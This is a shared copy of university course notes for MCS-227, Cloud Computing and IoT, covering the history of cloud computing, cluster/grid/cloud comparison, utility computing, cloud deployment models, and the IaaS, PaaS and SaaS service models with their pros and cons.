0% found this document useful (0 votes)
10 views

MCS-227

The document outlines the MCA (Semester III) course on Cloud Computing and IoT, detailing its structure, including four main blocks covering cloud fundamentals, resource provisioning, IoT technologies, and application development. It discusses the evolution of cloud computing, its characteristics, benefits, and various applications across sectors such as education, e-commerce, and healthcare. Additionally, it compares cluster, grid, and cloud computing, emphasizing the shift towards utility computing and the advantages of cloud services.

Uploaded by

builddwell9
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
10 views

MCS-227

The document outlines the MCA (Semester III) course on Cloud Computing and IoT, detailing its structure, including four main blocks covering cloud fundamentals, resource provisioning, IoT technologies, and application development. It discusses the evolution of cloud computing, its characteristics, benefits, and various applications across sectors such as education, e-commerce, and healthcare. Additionally, it compares cluster, grid, and cloud computing, emphasizing the shift towards utility computing and the advantages of cloud services.

Uploaded by

builddwell9
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 226

MCA (Semester – III)

Course Code - MCS-227


Course Title - Cloud Computing and IoT
Credits - 4

BLOCK 1: CLOUD COMPUTING FUNDAMENTALS AND VIRTUALIZATION

Unit 1: Cloud Computing: An Introduction

Unit 2: Cloud Deployment Models, Service Models and Cloud Architecture

Unit 3: Resource Virtualization

BLOCK 2: RESOURCE PROVISIONING, LOAD BALANCING AND SECURITY

Unit 4: Resource Pooling, Sharing and Provisioning

Unit 5: Scaling

Unit 6: Load Balancing

Unit 7: Security Issues in Cloud Computing

BLOCK 3: IoT FUNDAMENTALS AND CONNECTIVITY TECHNOLOGIES

Unit 8: Internet of Things: An Introduction

Unit 9: IoT Networking and Connectivity Technologies

BLOCK 4: Application Development, Fog Computing and Case Studies

Unit 10: IoT Application Development

Unit 11: Fog Computing and Edge Computing

Unit 12: IoT Case Studies


Unit 1: Cloud Computing: An Introduction

1.1. Traditional Computing Approaches


Previously, the power of computing was considered to be costly and scarce. Today, with
the emergence of cloud computing, it is plentiful and inexpensive, causing a profound
paradigm shift — a transition from scarcity computing to abundance computing. This
computing revolution accelerates the commoditization of products, services and business
models and disrupts current information and communications technology (ICT) Industry
.It supplied the services in the same way to water, electricity, gas, telephony and other
appliances. Cloud Computing offers on-demand computing, storage, software and other
IT services with usage-based metered payment. Cloud Computing helps re-invent and
transform technological partnerships to improve marketing, simplify and increase security
and increasing stakeholder interest and consumer experience while reducing costs. With
cloud computing, you don't have to over-provision resources to manage potential peak
levels of business operation. Then, you have the resources you really required. You can
scale these resources to expand and shrink capability instantly as the business needs
evolve. This computing paradigm gave rise to many forms of distributed computing such
as grid computing and cloud computing.
These vast applications required high-performance computing systems for their execution
wherein the concept of cluster computing, grid and cloud computing came into existence. Some of
the examples are:
 Numerous Scientific and engineering applications
 Modeling, simulation and analysis of complex systems like climate, galaxies, molecular
structures, nuclear explosions, etc.
 Business and Internet applications such as e-commerce and web-servers, file servers,
databases, etc.
For running these applications, the traditional approach to computing in the form of
parallel computing was used. But, then, the dedicated parallel computers were very
expensive and were not easily extensible. Hence, as per the users’ demand, the computer
scientists or engineers designed the cost-effective approaches in the form of cluster, grid
and cloud computing.

1.2. Evolution of Cloud Computing


Today’s PCs have remarkably high computing power. In the last few years, networking
capabilities have also improved phenomenally. It is now possible to connect clusters of
workstations with latencies and bandwidths comparable to tightly coupled machines. The
concept of “Clusters” started to take off in the 90’s. The term “grid computing” also
originated in the early 1990s as a metaphor for making the computer power as easy to
access as an electric power grid. The grids were considered as an innovative extension to
the distributed computing technology. However, the development of Cloud Computing
through various phases, including Grid Computing, Utility Computing, Application
Service Provision and Software as a Service, etc., has taken place in a remarkable way.
But the overall (whole) concept of the provision of computing resources via a global
network began in the 1960s. But the history of cloud computing is how we got there and
where all that started. Cloud computing has a history that is not that old, the first business
and consumer cloud computing website was launched in 1999 (Salesforce.com and
Google). Cloud computing is directly connected to Internet development and the
development of corporate technology as cloud computing is the answer to the problem of
how the Internet can improve corporate technology. Business technology has a rich and
interesting background, almost as long as businesses themselves, but the development
that has influenced Cloud computing most directly begins with the emergence of
computers as suppliers of real business solutions. History of Cloud Computing Cloud
computing is one of today's most breakthrough technologies.
 Early Phases of 1960s
Computer scientist John McCarthy had the concept of time-sharing that allowed the
organization to use an expensive mainframe at the same time. This machine is described
as a major contribution to Internet development, and as a leader in cloud computing.
 1969
J.C.R. Licklider, responsible for the creation of the Advanced Research Projects
Agency (ARPANET), proposed the idea of an "Intergalactic Computer Network"
or "Galactic Network" (a computer networking term similar to today’s Internet).
His vision was to connect everyone around the world and access programs and
data from anywhere.
 1970s
 Usage of tools such as VMware for virtualization. More than one operating
system can be run in a separate environment simultaneously. In a different
operating system it was possible to Cloud Computing: Unedited Version pg. 15
operate a completely different computer (virtual machine). IN 1997 Prof Ramnath
Chellappa in Dallas in 1997 seems to be the first known definition of "cloud
computing," "a paradigm in which computing boundaries are defined solely on
economic rather than technical limits alone." IN 1999 Salesforce.com was
launched in 1999 as the pioneer of delivering client applications through its simple
website. The services firm has been able to provide applications via the Internet
for both the specialist and mainstream software companies. IN 2003 This first
public release of Xen ,is a software system that enables multiple virtual guest
operating systems to be run simultaneous on a single machine, which also known
as the Virtual Machine Monitor ( VMM) as a hypervisor. IN 2006 The Amazon
cloud service was launched in 2006. First, its Elastic Compute Cloud ( EC2)
allowed people to use their own cloud applications and to access computers.
Simple Storage Service (S3) was then released. This incorporated the user-as-you-
go model and has become the standard procedure for both users and the industry
as a whole.
1.3. Comparison between Cluster, Grid and Cloud Computing

FEATURES CLUSTER GRID COMPUTING CLOUD


COMPUTING COMPUTING
Characteristics Tightly coupled Loosely coupled Dynamic
systems, Single system (Decentralization) computing
image, Centralized Job Diversity and infrastructure, IT
management & Dynamism Distributed service-centric
scheduling system Job Management & approach, Self-
scheduling service based
usage model,
Minimally or self-
managed platform,
Consumption-
based billing
Physical Structure In cluster computing, a In grid computing, the In cloud
bunch of computers do not have computing, the
similar/identical to be in the same computers need
computers are hooked physical location and not to be in the
up locally (in the same can be operated same physical
physical location, independently. As far location.
directly connected with as other computers are
very high speed concerned each
connections) to operate computer on the grid is
as a single computer a distinct computer
Hardware The cluster computers The computers that are The memory,
all have the same part of a grid can run storage device and
hardware and OS different operating network
systems and have communication
different hardware are managed by
the operating
system of the
basic physical
cloud units. Open
source Software
such as LINUX
can support the
basic physical unit
management and
virtualization
computing.
Resources The whole system (all Every node is Every node acts as
nodes) behaves like a autonomous i.e. it has an independent
single system view and its own resource entity
resources are managed manager and behaves
by centralized resource like an independent
manager. entity
Applications 1. Educational 1.Predictive Modeling 1.Banking
resources and Simulations 2.Insurance
2.Commercial sectors 2.Engineering Design 3.Weather
for industrial promotion and Automation Forecasting
3.Medical research 3.Energy Resources 4.Space
Exploration 4.Medical, Exploration
Military and Basic 5.Software as a
Research service 6.PaaS
5.Visualization 7.Infrastructure-
as -a-Service
Networking Dedicated, high-end Mostly Internet with Dedicated, high-
with low latency and high latency and low end with low
high bandwidth Bandwidth latency and high
Interconnection Interconnection Bandwidth
Network Network Interconnection
Network
Scalability Size or scalability is Size or scalability is Size or scalability
100s 1000s is 100s to 1000s
1.4. Utility Computing

Utility computing basically refers to the utility computing technologies and the business models that
are offered by a service provider to the IT customers. The client is charged as per their consumption.
Examples of these IT services are storage, computing power, and applications.
The term utility is basically the utility services like water, telephone, electricity, and gas that are
provided by any utility company. In a similar manner, the customer when receives utility computing,
its computing power on the shared computer network bills is decided on the basis of the consumption
which is measured.
Utility computing is similar to virtualization and the total web storage space amount with the
computing power that is made available to the user is higher as compared to a single time-sharing
computer. The web service is possible through a number of backend web servers. The web servers
could be dedicated and used as a cluster form which is created and then gets leased to the end-user.
Distributed computing is the method where a single such calculation is done on multiple web servers.
In utility computing, there is a provider who will own the storage or power resources. The customer is
charged based on how much they make use of the services. The customer is not charged each month
and the services are not sold outright. Depending on the resources that are offered utility computing
could also be called Infrastructure as a Service or IaaS and Hardware as a Service or HaaS.
Their function is similar to the other basic utilities. It is like you or any major company uses
electricity. Both of you do not pay a flat monthly rate but pay the amount as per the electricity that
you consume.
There are companies that offer a different kind of utility computing where the user will rent a cloud
computer and use it in order to run the applications or an algorithm or anything that may need a lot of
computing power. You pay per second or per hour and do not pay a flat fee to use the service.
Utility computing is beneficial because of its flexibility. Since you do not own the resource and are
not leasing them for long it is easy to change the amount of power that you buy. You are free to grow
or to shrink the service amount within a few seconds based on your business requirements.

1.5. Characteristics of Cloud Computing

 On-demand Self Service: A consumer can request and receive access to a service offering,
without an administrator or some sort of support staff having to fulfil the request
manually.
 Broad network Access: The servers can be accessed from any location using any type of
device – anywhere access and anytime.
 Resource Pooling: Resource can be storage, memory, network bandwidth, virtual
machines, etc. which can be consumed by the cloud users. Resource Pooling means that
multiple customers are serviced from the same physical resources.
 Measured Services: Pay according to the services you use.
 Rapid Elasticity and Stability: One of the great things about cloud computing is the ability
to quickly provision resources in the cloud as organizations need them and then to remove
them when they don’t need them.
 Easy maintenance: Maintenance of the cloud is easier.
 Security: Copy of our data on various servers i.e., if 1 fails, data is safe on the other.

1.6. Benefits of Cloud Computing


 Resources accessible anywhere, anytime
 On-demand self-service
 Reduced IT cost(We need not purchase hardware, no maintenance, etc.)
 Scalability- If traffic on website is more, we can scale up anytime and similarly scale
down also.
 Online development and deployment tools
 Collaboration – People sitting in different countries can do a project through collaborating
and getting their data stored on the cloud
 Offers security as data stored is stored at multiple locations.
 Location and device independence
 Saves our time – we need not update the softwares, or maintain the hardware.

1.7. Applications of Cloud Computing


1. Online Data Storage :

Cloud computing allows storing data like files, images, audios, and videos, etc on the cloud
storage. The organization need not set physical storage systems to store a huge volume of
business data which costs so high nowadays. As they are growing technologically, data
generation is also growing with respect to time, and storing that becoming problem. In that
situation, Cloud storage is providing this service to store and access data any time as per
requirement.
2.
3. Backup and Recovery:

Cloud vendors provide security from their side by storing safe to the data as well as providing
a backup facility to the data. They offer various recovery application for retrieving the lost
data. In the traditional way backup of data is a very complex problem and also it is very
difficult sometimes impossible to recover the lost data. But cloud computing has made
backup and recovery applications very easy where there is no fear of running out of backup
media or loss of data.
4.
5. Big data Analysis:

We know the volume of big data is so high where storing that in traditional data management
system for an organization is impossible. But cloud computing has resolved that problem by
allowing the organizations to store their large volume of data in cloud storage without
worrying about physical storage. Next comes analyzing the raw data and finding out insights
or useful information from it is a big challenge as it requires high-quality tools for data
analytics. Cloud computing provides the biggest facility to organizations in terms of storing
and analyzing big data.

6. E-commerce Application:
Cloud-based e-commerce allows responding quickly to the opportunities which are emerging.
Users respond quickly to the market opportunities as well as the traditional e-commerce
responds to the challenges quickly. Cloud-based e-commerce gives a new approach to doing
business with the minimum amount as well as minimum time possible. Customer data,
product data, and other operational systems are managed in cloud environments.

7. Cloud computing in education :

Cloud computing in the education sector brings an unbelievable change in learning by providing e-
learning, online distance learning platforms, and student information portals to the students. It is a
new trend in education that provides an attractive environment for learning, teaching, experimenting,
etc to students, faculty members, and researchers. Everyone associated with the field can connect to
the cloud of their organization and access data and information from there.

6.E-Governance Application :

Cloud computing can provide its services to multiple activities conducted by the government. It can
support the government to move from the traditional ways of management and service providers to an
advanced way of everything by expanding the availability of the environment, making the
environment more scalable and customized. It can help the government to reduce the unnecessary cost
in managing, installing, and upgrading applications and doing all these with help of could computing
and utilizing that money public service.

7. Cloud Computing in Medical Fields :

In the medical field also nowadays cloud computing is used for storing and accessing the data as it
allows to store data and access it through the internet without worrying about any physical setup. It
facilitates easier access and distribution of information among the various medical professional and
the individual patients. Similarly, with help of cloud computing offsite buildings and treatment
facilities like labs, doctors making emergency house calls and ambulances information, etc can be
easily accessed and updated remotely instead of having to wait until they can access a hospital
computer.
8. Entertainment Applications:

Many people get entertainment from the internet, in that case, cloud computing is the perfect place for
reaching to a varied consumer base. Therefore different types of entertainment industries reach near
the target audience by adopting a multi-cloud strategy. Cloud-based entertainment provides various
entertainment applications such as online music/video, online games and video conferencing,
streaming services, etc and it can reach any device be it TV, mobile, set-top box, or any other form. It
is a new form of entertainment called On-Demand Entertainment (ODE).

1.8. Challenges of Cloud Computing


 Availability of Services
 Data Lock-In: Shifting of large volume of data from one platform to another.
 Data Seggregation: Isolation of data of each user.
 Scaling Resources: Sudden demand of increased resources may arise.
 Location of Data: Geographically stored(Each country has its own rule)
 Deletion of Data: User demands complete removal of data
 Recovery and Backup: How frequently and how fast a cloud system recovers from failure.
UNIT 2 CLOUD DEPLOYMENT MODELS, SERVICE
MODELS AND CLOUD ARCHITECTURE
Structure
2.0 Introduction
2.1 Objectives
2.2 Cloud Deployment Models
2.2.1 Public Cloud
2.2.2 Private Cloud
2.2.3 Community Cloud
2.2.4 Hybrid Cloud
2.3 Choosing Appropriate Deployment Model
2.3.1 Suitability of Public Cloud
2.3.2 Suitability of Private Cloud
2.3.3 Suitability of Community Cloud
2.3.4 Suitability of Hybrid Cloud
2.3.5 Comparative analysis of cloud deployment models
2.4 Service Delivery Models
2.4.1. Infrastructure As a Service (IaaS)
2.4.2. Platform As a Service(PaaS)
2.4.3. Software As a Service (SaaS)
2.4.4. Other Services (Security Management, Identity Management, Storage, Database, Back-up, etc.)
2.5 Cloud architecture
2.6 Layers and Anatomy of the Cloud
2.7 Network Connectivity in Cloud Computing
2.8 Summary
2.9 Solutions/Answers
2.10 Further Readings

2.0 INTRODUCTION
The purpose of this chapter is to provide a broad range of cloud deployment methods, which are one of the most
essential topics in cloud computing. The various methods in which the cloud computing environment may be set up
or the various ways in which the cloud can be deployed are referred to as deployment models. It is critical to have a
basic understanding of deployment models since setting up a cloud is the most basic requirement before moving on
to any other aspects of cloud computing. This chapter discusses the basic three core cloud computing service
models, namely IaaS, PaaS, and SaaS. The end user's and service provider roles may differ depending on the
services given and subscribed to. In addition, the end user and service provider responsibility of IaaS, PaaS, and
SaaS are discussed in this chapter. This chapter also covers appropriateness, and benefits and drawbacks of various
cloud service models. This chapter consists of a brief overview of various other service models such as NaaS,
STaaS, DBaaS, SECaaS, and IDaaS. The cloud architecture is initially described in this chapter. Cloud architecture
is made up of a series of components arranged in a hierarchical order that collectively define how the cloud
functions. The cloud anatomy is explained in the next section, followed by an overview of cloud network
connection.

2.1 OBJECTIVES
After completion of this unit, you will be able to:

• Be familiar with the different deployment models.


• Contrast and compare different service delivery models

• Give a high-level overview of the cloud architecture.

• Provide information about the cloud's layers and anatomy.

• Describe how network connection plays a part in cloud computing.

2.2 CLOUD DEPLOYMENT MODELS


Now a days, the majority of businesses use cloud infrastructure to save capital investment and control operational
costs since it provides several advantages such as lower infrastructure expenses, more mobility, scalability, and
improved collaboration. These advantages should be categorized according to the organization needs based on the
deployment model. The infrastructure accessibility and ownership are the factors to be considered into cloud
deployment models. The deployment model defines the ways for deploying or making cloud services available to
clients based on ownership, capacity, access and purpose. The kinds of deployments vary according to the
management of the infrastructure and the location of that infrastructure.
There are four main categories of the deployment models are:
 Public
 Private
 Community
 Hybrid
2.2.1 Public Cloud: The most popular and common deployment is the public cloud. The public cloud is accessible
from anywhere in the globe and is ease to use for the general public. Any organization or enterprise or academic or a
combination of them, may own and manage it. The entire infrastructure is located on the cloud provider's premises.
It’s a pay-per-use model and provides the services on demand according to service-level agreements. An end user
can actually buy these resources on an hourly basis and utilize them as needed. In public cloud, users no need to
maintain any infrastructure instead everything will be owned and operated by cloud public provider. The following
Fig. 2.2.1 represents the public cloud.

Fig.2.2.1 Public Cloud

The Public cloud model has the following benefits:

 Minimal Investment: This model eliminates the need for extra hardware expenditures.
 No startup costs: Users can rent the computing resources on pay-per-use, there is no need of establishing
infrastructure from user side in turn reduces the startup costs.
 Infrastructure Management is not required: There is no need of any hardware to be set up from user
side but everything is operated and controlled by service provider.
 Zero maintenance: The service provider is responsible for all maintenance work from infrastructure to
software applications.
 Dynamic Scalability: On-demand resources are provisioned dynamically as per customer requirements.

2.2.2 Private Cloud: It is a cloud environment created specifically for a single enterprise. It is also known as on-
premise cloud. It allows access to infrastructure and services inside the boundaries of an organization or company.
Private cloud is more secure when compared to similar models. Because the private cloud is usually owned,
deployed and managed by the organization itself, the chance of data leakage is very less. Because all users are
members of the same organization, there is no risk from anybody else. In private clouds, only authorized users have
access, allowing organizations to better manage their data and security. The following Fig. 2.2.2 represents the
private cloud.

Fig. 2.2.2 Private Cloud

The Private cloud model has the following benefits:

 Better Control: Private cloud is managed by their own organization staff.


 Data Privacy: Data is accessed and managed by inside the boundaries of an organization.
 Security: Provides security for the data because only authorized users may access it.
 Customization: In contrast to a public cloud deployment, private cloud allows a customization of
resources to meet its specific needs.

2.2.3. Community Cloud: The community cloud is the extension of private cloud and this kind of model is
sharing cloud infrastructure among multiple organizations in the same community or area. Organizations,
businesses, financial institutions and banks etc. are examples of this category. The infrastructure is provided for
exclusive usage by a group of users from companies with similar computing requirements in a community cloud
environment. The following Fig. 2.2.3 represents the community cloud.

Fig. 2.2.3 Community Cloud


The Community cloud model has the following benefits:

 Cost-effective: Community cloud is cost-effective since its infrastructure cost is


shared among number of enterprises or communities.
 Security: The community cloud is more secure compared to public cloud
 Shared resources: Infrastructure and other resources shared with multiple organizations.
 Data sharing and collaboration: It is excellent for both data sharing and collaboration.
 Setup Benefits: Customers may be able to work more efficiently as a consequence of these shared
resources.
 Smaller investment: Investment on infrastructure is shared among organizations in the
community.

2.2.4. Hybrid Cloud: It is a kind of integrated cloud computing, which means that it may be a combination of
private, public, and community cloud, all of which are integrated into a single architecture but remain
independent entities inside the overall system. This aims to combine the benefits of both private and public
clouds. The most common way to use the hybrid cloud is to start with a private cloud and then use the public
cloud for more resources. It is possible to utilize the public cloud for non-critical tasks like development and
testing. On the other hand, critical tasks such as processing company data are carried out on a private cloud. The
following Fig. 2.2.4 represents the hybrid cloud.

Fig. 2.2.4 Hybrid Cloud

The Hybrid cloud model has the following benefits:

• Flexibility and control: Companies with greater flexibility may create customized solutions to match their
specific requirements.
• Cost: Cost is less compared to public cloud users paid only for additional resources used from public
cloud.
• Partial Security: The hybrid cloud is generally a mix of public and private clouds. Although the private
cloud is considered as secure and the hybrid cloud includes public cloud, poses a significant chance of
security breach. As a result, it can only be described as partially secure.
2.3 CHOOSING APPROPRIATE DEPLOYMENT MODELS
The instances where this cloud model may be employed are referred to as selecting an acceptable deployment
model. It also denotes the best circumstances and environment in which this cloud model may be implemented.

2.3.1 Suitability of Public Cloud:

The public cloud model is appropriate in the following circumstances:

 There is a high demand for resources, resulting in a large user base.


 There is a dynamic change of resources based on customer requirements.
 No physical infrastructure exists.
 A company's finances are limited.

The public cloud model is not appropriate in the following circumstances:

 It is critical to maintain a high level of security.


 Autonomy is expected by the organization.
 Reliability from a third party is not recommended.

2.3.2 Suitability of Private Cloud:

The term suitability in terms of cloud refers to the conditions under which this cloud model is appropriate. It also
denotes the best circumstances and environment in which to use this cloud model, such as the following:

 Enterprises or businesses that demand their own cloud for personal or business purposes.
 Business organizations have appropriate financial resources, since operating and sustaining a cloud is an
expensive effort.
 Business organizations consider the data security to be important.
 Enterprises want to get complete control and autonomy over cloud resources.
 Private cloud is suitable for organizations with less number of employees.
 Organizations that already have a pre-built infrastructure will choose private cloud for managing
resources efficiently.
The private cloud model is not appropriate in the following circumstances:

 An organization consists of more number of users.


 Enterprises that have constraints on finance.
 Organizations that do not have a pre-existing infrastructure
 Organizations with insufficient operational staff to maintain and administer the cloud

2.3.3 Suitability of Community Cloud:

The Community cloud is suitable for the organizations with the following concerns:

 Wish to build a private cloud but lack of financial support.


 Don’t want to take complete control of maintenance responsibility of the cloud
 Desire to work in collaboration for effective outcome.
 provides more security when compared to public cloud
The community cloud model is not appropriate in the following circumstances:

 Organizations want to get complete control and autonomy over cloud resources.
 Doesn't really want to collaborate with other organizations

2.3.4 Suitability of Hybrid Cloud:

The hybrid cloud model is appropriate in the following circumstances:

 Organizations that desire a private cloud environment with public cloud scalability
 Businesses that demand greater protection compared to the public cloud.

The Hybrid cloud model is not appropriate in the following circumstances:

 Organizations that prefer security as a top priority


 Organizations that are unable to handle complex hybrid cloud infrastructures

2.3.5 Comparative analysis of cloud deployment models

Hybrid
Characteristics Public Private Community
Demand for
in-house Shared among Required for private
Not required Mandatory
infrastructure organizations cloud

Requires an
Requires an operational IT staff Complex because
Ease of use Very easy to use operational from multiple involves more than one
IT staff organizations deployment model

Cheaper than private


Affordable and High
Cost is distributed cloud and costlier than
Cost lower compare compared to
among organizations public cloud
to other models public cloud
Higher than public
Provides
Higher than public cloud and lower than
Less secure than more
Security cloud and lower than private and community
other models security than
private cloud cloud
other models
Cloud service Provider
Multiple for public cloud and
Cloud service Single
Ownership organizations with organization for private
Provider Organization
similar concerns cloud

Cloud service Provider


Organization operational staff for public cloud and
Cloud service
Managed by operational among multiple operational staff for
Provider
staff organizations private cloud

High
Scalability Very High Limited Limited
2.4 CLOUD SERVICE DELIVERY MODELS

Cloud computing model is used to deliver the services to end users from a pool of shared resources such as compute
systems, network components, storage systems, database servers and software applications as a pay-as-you-go
service rather of purchasing or owning them. The services are delivered and operated by the cloud provider, which
reduces the end user's management effort. Cloud computing allows the delivery of a wide range of services
categorized into three basic types of delivery models as follows:

 Infrastructure as a Service
 Platform as a Service
 Software as a Service

Different cloud services are aimed towards different type of users, as shown in Fig. 2.4.1. For instance, consider the
IaaS model is aimed at infrastructure architects, whereas PaaS is aimed at software developers and SaaS is aimed at
cloud users.

Fig. 2.4.1 Cloud Service delivery models

2.4.1 IaaS: on Demand Virtualized Infrastructure

The resources are provisioned to the users of IaaS, to run any kind of software, including operating systems and
applications, by giving them access to fundamental computer resources like processing, storage, and networks.
There is no control over the physical infrastructure, but the user has control over operating systems, storage and
installed software, as well as specific networking components (for example host and firewalls). A service model
known as IaaS refers to the usage of a third-party provider's virtual physical infrastructure in place of one's own
(network, storage, and servers). Because IT resources are housed on external servers, they may be accessed by
anybody with an internet connection.

The IT architect or infrastructure architect is the target audience for IaaS. The infrastructure architect may choose
the virtual machine instance based on their requirements. The physical servers are managed by the service providers.
As a result, the complexity of managing the physical infrastructure is removed or hidden from the IT architects. The
following services might be provided by a regular IaaS provider.

 Compute: Virtual computing power and main memory are provided to end users as part of Computing as a
Service.
 Storage: It provides back-end storage for storing files and VM images.
 Network: There are many number of networking components like bridges, routers and, switches are
provided virtually.
 Load balancers: These are used to manage the sudden spikes in usage of infrastructure for balancing the
load
Pros and Cons of IaaS

IaaS is a one of the most prominent cloud computing service delivery model. It provides more benefits to the IT
architects.

The following are the advantages of IaaS:

1. Charging based on usage: The services of IaaS are provisioned on a pay-per-use basis to users. Customers are
paid for only what they have used. This strategy reduces the needless expenditure of investment on hardware
purchases.

2. Reduced cost: IaaS providers allow their customers to rent computing resources on a subscription basis instead of
investing on physical infrastructure to run their operations. IaaS eliminates the need to purchase physical resources,
lowering the total cost of investment.

3. Elastic resources: IaaS provides resources depending on user requirement. The resources can be scale up and
scale down by using load balancers. Load balancers automate the process of dynamic scaling by sending additional
requests are redirected the new resources.

4. Better resource utilization: The most important factor of IaaS provider is the resource utilization. To get return
on investment by utilizing the infrastructure resources efficiently.

5. Supports green IT: Dedicated servers are utilized for many business requirements in conventional IT
architecture. The power consumption will be more due to the large number of servers deployed. IaaS eliminates the
need for dedicated servers since a single infrastructure is shared among several clients, decreasing the number of
servers in turn decreases the power consumption resulting in Green IT.

• Despite the fact that IaaS saves investment cost for start-up companies, but it lacks security for data protection.

The following are some of the disadvantages of IaaS:

1. Security issues: IaaS is providing services through Virtualization technology through hypervisors.. There are
several chances to attack the compromised hypervisors. If hypervisors are compromised, any virtual machines may
be simply attacked. The majority of IaaS providers are unable to ensure complete security for virtual machines and
the data stored on them.

2. Interoperability issues: IaaS service providers don't have any standard operating procedures. Any VM transfer
from one IaaS provider to another is a difficult one. Customers may encounter the issue of vendor lock-in issue.

3. Performance issues: It is providing resources from distributed servers, those are connected through a network..
The network latency is a key factor in determining performance of the service. Due to latency concerns, the VM's
performance might suffer from time to time.

The following are the popular examples of IaaS :

 Microsoft Azure
 Rackspace
 AWS
 Google Compute Engine
2.4.2 PaaS: Virtualized development environment

The PaaS user or developer can develop their applications on virtualized development platform provided by PaaS
provider. The users doesn't have the control on the development platform and underlying infrastructure like servers,
storage , network and operating system but the user has control on the deployed applications as well data related to
that applications.

Developers can build their applications online using programming languages supported on provider platform and
deploy their applications using testing tools supporting the same platform. Pass users utilizing the services offered
by the providers through the internet. As a result, the cost of obtaining and maintaining a large number of tools for
constructing an application is decreased. PaaS services include a wide range of programming languages supported
on platforms, databases, and testing software tools. PaaS providers provide a wide range of software development
and deployment capabilities including load balancers.

1. Programming languages: PaaS providers offer a scope for multiple programming languages in which users can
develop their own applications. Some examples of languages are python, java, Scala, PHP and Go etc.

2. Application platforms: PaaS providers offer a variety of application platforms, those are used to develop
applications. The popular examples of platforms are Joomla, Node.js, Drupal, WordPress, Django and Rails

3. Database: Applications need backend for storing data. Database is always associate with frontend application to
access data. Databases are provided by PaaS providers as part of their PaaS platforms. Some of the prominent
databases offered by PaaS vendors are Redis, MongoDB, ClearDB, Membase, PostgreSQL, and Cloudant.

4. Testing tools: Testing tools are provided by PaaS providers as part of their PaaS platforms. Testing tools are
required to test application after development.

Pros and Cons of PaaS

The complexity of platform and underlying infrastructure maintenance is managed by PaaS provider. This allows
developers to concentrate more on the application development.
In addition, PaaS provides the following advantages:

1. App development and deployment: PaaS provides all the necessary development and testing tools in one place,
allowing you to build, test, and deploy software quickly. After the developer completes the development process,
most PaaS services automate the testing and deployment process. This is faster than conventional development
platforms in developing and deploying applications.

2. Reduces investment cost: The majority of conventional development platforms need high-end infrastructure
leads to increase the investment cost for application development. Using PaaS services eliminates the requirement
for developers to purchase licensed development and testing tools. On the other side, PaaS lets programmers rent
everything they need to create, test and deploy their applications. The total investment cost for the application
development is reduced because of expensive infrastructure is not required.

3. Team collaboration: Traditional development platforms do not offer much in the way of collaborative
development. PaaS allows developers from multiple locations to collaborate on a single project. The online shared
development platform supplied by PaaS providers makes this feasible.

4. Produces scalable applications: Applications need scale-up or scale-down the resources based on their load. In
case of scale-up, companies must keep an additional server to handle the increased traffic. New start-up companies
have a tough time expanding their server infrastructure in response to rising demand. PaaS services, on the other
hand, provide built-in scalability to applications produced on the PaaS platform.
When compared to the traditional development environment, PaaS offers several advantages to developers.
On the other side, it has several disadvantages, which are listed below:

1. Vendor lock-in: Vendor lock-in is a key disadvantage of PaaS providers. Lack of standards is the primary cause
of vendor lock-in. PaaS providers do not adhere to any common standards for providing services. The adoption of
proprietary technology by PaaS providers is another factor for vendor lock-in. The majority of PaaS companies
employ proprietary technologies that are incompatible with those offered by other PaaS providers. PaaS services
have a vendor lock-in issue that prevents applications from being transferred one provider to another.

2. Security problems: Security is a big concern with PaaS services. Many developers are hesitant to use PaaS
services since their data is stored on third-party servers off-site. Obviously, many PaaS providers have their own
security mechanism to prevent user data from security breaches, but feeling safety of on-premise deployment is not
same as off-premise deployment.. When choosing a PaaS provider, developers should compare the PaaS provider's
regulatory, compliance, and security standards to their own security needs.

3. Less flexibility: PaaS limit developer’s ability to create their own application stack. Most PaaS providers give
access to a wide range of programming languages, database software’s, and testing tools but user doesn’t have
control on platform. Developers can only customize or build new programming languages for PaaS platform from a
few providers. The majority of PaaS vendors still do not give developers with enough flexibility.

4. Depends on Internet connection: Developers must have an internet connection in order to utilize PaaS services.
The majority of PaaS providers do not provide offline access but very few can provide offline access. With a poor
Internet connection, the PaaS platform's usability will not meet the developer expectations.

Examples of PaaS:

 Redhat Open Shift


 Google App Engine (GAE)
 Heroku
 Scalingo
 Python Anywhere
 Azure App Service
 AWS Elastic Beanstalk

2.4.3 SaaS: Cloud based application

The end user has the option of using the provider's cloud-based applications. It is possible to access the software
from multiple client devices using a web browser or other client interface (such as web-based e-mail). The
customer has no access or control over the cloud infrastructure, which includes networks, servers, operating
systems, storage, software platforms, and configuration settings. An internet based, no-installation kind of
software as a service has been provided on subscription and these services may be accessed from any location in
the globe.

SaaS applications are provided on-demand through the internet, users can access these applications through web
enabled interface without software installation on end-user machines. Users have complete control over when,
how and how often they use SaaS services. SaaS services can be accessed through web browser on any device,
including computers, tablets and smart devices. Some SaaS services can be accessed by a thin client, which
does not have as much storage space as a standard desktop computer and cannot run many applications. Thin
clients for accessing SaaS applications have a longer lifespan, lower power consumption and lower cost are all
advantages of using these devices. A SaaS provider might provide a variety of services, including business
management services, social media services, document management software’s and mail services.

1. Business services: In order to attract new customers, the majority of SaaS suppliers now provide a wide
range of commercial services. SaaS include ERP, CRM, billing, sales and human resources.

2. Social media networks: Several social networking service providers have used SaaS as a method of assuring
their long-term survival because of the widespread usage of social networking sites by the general public.
Because the number of users on social networking sites is growing at a rapid rate, cloud computing is the ideal
solution for varying load.

3. Document management: Because most businesses rely heavily on electronic documents, most SaaS
companies have begun to provide services for creating, managing, and tracking them.

4. E-mail services: Many people utilize e-mail services these days. The potential growth in e-mail usage is
unexpected. Most e-mail providers started offering their services as SaaS services to deal with the unexpected
amount of users and demand on e-mail services.

Pros and Cons of SaaS

SaaS provides software applications that are used by a wide range of consumers and small organizations
because of the cost benefits they provide.

SaaS services give the following advantages in addition to cost savings:

1. No client-side installation: Client-side software installation is not required for SaaS services. Without any
installation, end users may receive services straight from the service provider's data centre. Consuming SaaS
services does not need the use of high-end hardware. It may be accessible by thin clients or any mobile device.

2. Cost savings: Because SaaS services are billed on a utility-based or pay-as-you-go basis, end customers must
pay only for what they have utilized. Most SaaS companies provide a variety of subscription options to suit the
needs of various consumers. Sometimes free SaaS services are provided to end users.

3. Less maintenance: The service provider is responsible for automating application updates, monitoring, and
doing other routine maintenance then the user is not responsible for maintain the software.

